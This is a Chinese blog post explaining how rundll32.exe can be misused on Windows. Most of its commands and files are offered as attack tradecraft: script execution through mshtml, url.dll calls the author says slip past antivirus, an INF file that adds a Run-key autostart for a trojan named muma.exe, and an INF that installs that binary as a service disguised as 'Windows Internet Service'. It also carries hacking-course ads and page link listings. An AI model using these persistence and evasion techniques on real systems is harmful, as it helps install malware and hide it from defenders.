详细讲解,命令行下的“蒙面歌王”rundll32.exe

已于 2023-10-30 18:02:04 修改
阅读量280 收藏
点赞数
文章标签: 网络安全 web安全 安全架构 网络 系统安全 计算机网络 网络攻击模型
于 2023-10-30 17:59:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61101264/article/details/134124931
版权

在Windows系统中,为了节省内存和实现代码重用,微软在Windows操作系统中实现了一种共享函数库的方式。这就是DLL(Dynamic Link Library)文件,即动态链接库,这种库包含了可由多个程序同时使用的代码和数据。Rundll.exe 和 Rundll32.exe 的命令行实用程序,通过这两个程序可调用从16位或32位DLL导出的函数。现在Rundll.exe 基本被淘汰,rundll32.exe格式为:RUNDLL32.EXE , 。这本来是微软的一个正常的命令,但是在黑客手里会发生巨大的作用,有些命令不为外人所知,堪称命令行下的蒙面歌王,我为大家来揭面一下,让大家知道它的不为人知的几个功能。

一、用C++如何写一个简单的被Rundll32.exe调用的dll

我用Visual studio 2017写了一个简单的代码,内容如下:

// Dll3.cpp: 定义 DLL 应用程序的导出函数。
//

#include "stdafx.h"
#include <atlstr.h>

extern "C" __declspec(dllexport)
void F2(
	HWND hwnd,        // handle to owner window   
	HINSTANCE hinst,  // instance handle for the DLL   
	LPTSTR lpCmdLine, // string the DLL will parse   
	int nCmdShow      // show state   
)
{
	if (strlen(lpCmdLine) != 0)
	{
		CString num;
		num = lpCmdLine;
		MessageBox(0, "Message body", num ,MB_OK);
	}
	else
	{
		MessageBox(0, "Message body", "Message title", MB_OK);

	}
}

全部工程文件我已经传到了https://haiyangtop.cn/dll3.rar。我们在命令行下运行rundll32 dll3.dll ,F2 888,那么就会弹出标题为888的对话框。全部工程文件我已经传到了https://haiyangtop.cn/dll3.rar。我们在命令行下运行rundll32 dll3.dll ,F2 888,那么就会弹出标题为888的对话框。

二、用Rundll32.exe运行js或vbs的脚本代码

rundll32 javascript:"\..\mshtml,RunHTMLApplication ";window.execScript("msgbox('a')","vbs");window.close()

53fb0001b6c5c3d8832e.gif

动画里这条命令烂大街了,已经绕不过我本机的火绒了。

三、用Rundll32.exe执行命令绕过杀毒软件的作法

命令如下:

rundll32 url.dll, OpenURL file://c:\windows\system32\calc.exerundll32 url.dll, OpenURLA file://c:\windows\system32\calc.exerundll32 url.dll, FileProtocolHandler calc.exe

这是经过反汇编分析url.dll得出的结果,请记住这3条命令,活学活用,这是干货。上边的三条命令都可以绕开我本机的火绒。你可以多分析system32下的dll,说不定你还有惊喜。

四、用Rundll32.exe修改注册表

写一个c:/reg.inf文件,增加注册表启动项,代码如下:

[Version]Signature="$WINDOWS NT$"[DefaultInstall]AddReg=My_AddReg_NameDelReg=My_DelReg_Name[My_AddReg_Name]HKLM,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,KAVRun,0x00000000,c:/muma.exe

然后我们运行

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:/reg.inf

就可以增加一个键为KAVRun,值为c:/muma.exe的注册表项了。

5.png

删掉刚才加的注册表启动项,c:\reg.inf内容如下:

[Version]Signature="$WINDOWS NT$"[DefaultInstall]AddReg=My_AddReg_NameDelReg=My_DelReg_Name[My_DelReg_Name]HKLM,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,KAVRun

运行以下命令就可以删掉了

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:/reg.inf

几点说明:

  1. [Version]和[DefaultInstall]是必须的,AddReg和DelReg至少要有一个。My_AddReg_Name和My_DelReg_Name可以自定义。
  2. 0x00010001表示REG_DWORD数据类型,0x00000000或省略该项(保留逗号)表示REG_SZ(字符串)。0x00020000表示REG_EXPAND_SZ。关于inf文件的详细信息,可以参考DDK帮助文档。
  3. InstallHinfSection是大小写敏感的。它和setupapi之间只有一个逗号,没有空格。128表示给定路径,该参数其他取值及含义参见MSDN。特别注意,最后一个参数,必须是inf文件的全路径,不要用相对路径。
  4. inf文件中的项目都是大小写不敏感的。

五、使用rundll32.exe 增加一个服务

写一个srv.inf,内容如下:

[Version]
Signature="$WINDOWS NT$"
[DefaultInstall.Services]
AddService=inetsvr,,My_AddService_Name
[My_AddService_Name]
DisplayName=Windows Internet Service
Description=提供对 Internet 信息服务管理的支持。
ServiceType=0x10
StartType=2
ErrorControl=0
ServiceBinary=%11%\muma.exe

然后执行命令,会增加一个名字为inetsvr的服务。

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:/srv.inf

几点说明:

  1. ServiceType表示服务类型:0x10为独立进程服务,0x20为共享进程服务(比如svchost);
  2. StartType表示启动类型:0 系统引导时加载,1 OS初始化时加载,2 由SCM(服务控制管理器)自动启动,3 手动启动,4 禁用。
  3. ErrorControl表示错误控制:0 忽略,1 继续并警告,2 切换到LastKnownGood的设置,3 蓝屏。
  4. ServiceBinary里的服务程序位置:%11%表示system32目录,%10%表示系统目录(WINNT或Windows),%12%为驱动目录system32\drivers。其他取值参见DDK。你也可以不用变量,直接使用全路径。
  5. 这四项是必须要有的。

删除刚才增加的服务,写一个dsrv.inf,内容如下:

[Version]        
Signature="$WINDOWS NT$"[DefaultInstall.Services]DelService=inetsvr

执行完以下命令就会删掉了

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:/dsrv.inf

INF的具体参数是请查看DDK相关资料。

六、网上老生常谈的rundll32的几十个常用快捷命令了,可能有些人并不清楚

命令列: rundll32.exe shell32.dll,Control_RunDLL

功能: 显示控制面板

命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,1

功能: 显示“控制面板-辅助选项-键盘”选项视窗

命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,2

功能: 显示“控制面板-辅助选项-声音”选项视窗

……

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

网络安全学习资源分享:

最后给大家分享我自己学习的一份全套的网络安全学习资料,希望对想学习 网络安全的小伙伴们有帮助!

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

【点击领取】CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

1.学习路线图

在这里插入图片描述

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。【点击领取视频教程】

在这里插入图片描述

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本【点击领取技术文档】

在这里插入图片描述

(都打包成一块的了,不能一一展开,总共300多集)

3.技术文档和电子书

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本【点击领取书籍】

在这里插入图片描述

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

在这里插入图片描述

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

网络安全入门到进阶
关注
rundll32
04-14
system32文件
关于 rundll32 的使用详解
冰峰 的专栏
05-23 705
摘自百度百科Rundll32 的作用及应用 Rundll32.exe是什么?顾名思意,“执行32位的DLL文件”。它的作用是执行DLL文件中的内部函数,这样在进程当中,只会有 Rundll32.exe,而不会有DLL后门的进程,这样,就实现了进程上的隐藏。如果看到系统中有多个Rundll32.exe,不必惊慌,这证明用 Rundll32.exe启动了多少个的DLL文件。当然,这些Rundll3
启动应用程序出现rundll32.exe找不到问题解决
wbcmbfy的博客
06-24 531
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个rundll32.exe文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现rundll32.exe丢失要怎么解决?
WIN7下通过命令调用“控制面板项” /   RUNDLL32详解 / CPL文件详解
weixin_34015860的博客
12-02 1550
CPL文件CPL文件,又叫控制面板项(Control Panel Item),多保存于系统安装目录的system32文件夹下,它们分别对应着控制面板中的项目,普通用户的访问受到限制。它可由shell32.dll、control.exe打开。此外,你也可以直接在资源管理器中双击调用Open命令打开(实质上调用了shell32.dll)。CPL文件本质是Windows可执行性文件...
C++创建jni 并且利用rundll32.exe调试jni程序
liaomin416100569的专栏
10-19 1193
eclipse 下新建工程 ctool建立包  com.c.utils新建类 ProxyUtil.java内容如下package com.c.utils;public class ProxyUtil {static {System.loadLibrary("cdll");}public native String getIEProxy();public static void main(String[] args) {ProxyUtil util=new ProxyUtil();System.out.pri
c++保存图标到dll_bat教程[274] RUNDLL32.EXE PRINTUI.DLL,PrintUIEntry
weixin_39627408的博客
11-22 770
古树屋Click to follow us(1)RUNDLL32.EXE PRINTUI.DLL,PrintUIEntry命令的简介C:\Users\86137>RUNDLL32.EXE PRINTUI.DLL,PrintUIEntry /?用法: rundll32 printui.dll,PrintUIEntry [options] [@commandfile]/a[file] ...
中国内地歌唱类综艺节目的突破与创新——以《中国新声代》《蒙面歌王》《最美和声》为例.zip
09-20
中国内地歌唱类综艺节目的突破与创新——以《中国新声代》《蒙面歌王》《最美和声》为例.zip
基于卷积神经网络级联的蒙面人脸检测算法.pdf
09-26
基于卷积神经网络级联的蒙面人脸检测算法.pdf
人脸修复-使用残差注意力+UNet实现蒙面人脸修复算法-附项目源码-优质项目实战.zip
最新发布
08-30
人脸修复_使用残差注意力+UNet实现蒙面人脸修复算法_附项目源码_优质项目实战
Face-maskInpainting(揭开蒙面).zip
03-23
在这个项目“Face-mask Inpainting(揭开蒙面)”中,我们可能探讨的是如何利用人工智能技术,特别是在深度学习框架下,来解决这一挑战。 首先,我们需要理解什么是图像修复(Inpainting)。图像修复是一种技术,...
Python_NeurIPS 2022 Spotlight VideoMAE蒙面自动编码器是用于自监督视频预训练的数据.zip
05-24
**Python在深度学习中的应用:VideoMAE蒙面自动编码器** VideoMAE(Video Masked Autoencoder)是一种新兴的自监督学习模型,专为视频数据的预训练设计。在NeurIPS 2022这样的顶级人工智能会议上,VideoMAE受到了...
rundll32.exe win10 32位
10-09
rundll32.exe win10 32位
Rundll32.exe狂占CPU解决方案
03-04
网页打开速度突然变慢,彻底杀毒,没有发现。再查看进程,一开始只有rundll32.exe耗cpu资源90%以上,每结束一次进程,网页打开就快些,但需要不断的结束。后来,这个进程不见了,又出来了另外一个进程explorer.exe,耗cpu资源90%以上,结束后桌面,任务栏全无。以下为解决方案:
rundll32.exe
12-24
rundll32.exe用于在内存中运行DLL文件,它们会在应用程序中被使用。这个程序对你系统的正常运行是非常重要的。注意:rundl132.exerundll32.exe神似。但是rundl132.exe是W32.Miroot.Worm病毒。该病毒允许攻击者访问你的计算机,窃取密码和个人数据。该进程的安全等级是建议立即删除
Rundll32.exe进程
weixin_30553777的博客
05-01 405
Rundll32.exe进程 转载自:http://diybbs.zol.com.cn/40/35_391259.html 进程文件:rundll32或者rundll32.exe 描述:rundll32.exe用于在内存中运行dll文件,它们会在应用程序中被使用。这个程序对你系统的正常运行是非常重要的 注意:rundll32.exe也可能是w32.miroot.worm病毒。...
转载:rundll32.exe命令介绍
weixin_30293079的博客
10-07 98
转载:rundll32.exe命令介绍 Rundll32.exe是什么?顾名思意,“执行32位的DLL文件”。它的作用是执行DLL文件中的内部函数,这样在进程当中,只会有Rundll32.exe,而不会有DLL后门的进程,这样,就实现了进程上的隐藏。如果看到系统中有多个Rundll32.exe,不必惊慌,这证明用Rundll32.exe启动了多...
RUNDLL32 & INF
呈灰的程序人生
01-26 2239
Today,While I am installing the Ultraedit,a batch file leave me a great impression.it reads:rundll32 setupapi.dll,InstallHinfSection DefaultInstall 128 ./Uedit32.infthese days I use the batch proc
独门安装卸载绝技:巧用Rundll32
zhaojiazhi的专栏
11-07 799
在Windows系统中安装和卸载程序是件非常容易的事情,一般用户通过安装和卸载程序向导就能很轻松地完成。但安装和卸载Windows程序还有些鲜为人知的小技巧,使用Rundll32命令安装和卸载Windows程序就是其中之一,可能你从来还没接触过,下面我们就一起领略它的神奇功能吧!    提示:Rundll32exe是 Windows系统提供的一个命令,它用来调用32位的DLL函数(16位的D
深挖 Rundll32.exe 的多种“滥用方式”以及其“特别”之处。
【Rainbow Network Technology co., LTD】
08-08 1489
在这篇文章中,我们将深挖 Rundll32.exe 的多种利用方法与其特别之处,以期对其有所了解。
基于深度学习的蒙面人脸检测方法研究
本文主要介绍基于深度学习的蒙面遮挡人脸检测算法,旨在解决人脸检测中一个难点,即蒙面遮挡人脸检测问题。该问题对大部分人脸检测算法而言是一个具有挑战性的问题,直接原因是由于遮挡带来的人脸特征缺失。 人脸...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值